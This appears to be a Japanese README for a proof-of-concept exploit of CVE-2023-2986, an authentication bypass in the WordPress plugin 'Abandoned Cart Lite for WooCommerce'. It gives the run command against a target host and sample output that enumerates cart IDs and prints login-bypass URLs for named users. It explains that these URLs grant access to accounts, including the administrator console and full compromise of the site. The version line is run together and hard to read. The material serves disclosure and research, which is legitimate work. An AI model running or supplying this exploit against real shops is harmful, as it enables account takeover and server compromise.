
CVE-2023-2986 の脆弱性に対する Proof of Concept - WordPress の 'Abandoned Cart Lite for WooCommerce' プラグイン
WordPress プラグイン 'Abandoned Cart Lite for WooCommerce' における脆弱性 CVE-2023-2986 の Proof of Concept
version <= 5.14.2version <= 5.15.15.15.05.15.2バージョン 5.15.0 で問題が修正されたと考えられていましたが、完全には修正されておらず、同様に更新されていることが判明しました。そのため、実際の修正バージョンは 5.15.2 です。
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
URL をブラウザで開くと、該当するユーザーのアカウントにアクセスできます。WordPress 管理者ユーザー自身のエントリがある場合、管理者コンソールへのアクセスが可能になり、WordPress サーバーが完全に侵害されます。
この Proof of Concept (PoC) は、純粋に学術研究と効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。作者は、PoC の誤用について一切の責任を負いません。責任を持って使用してください。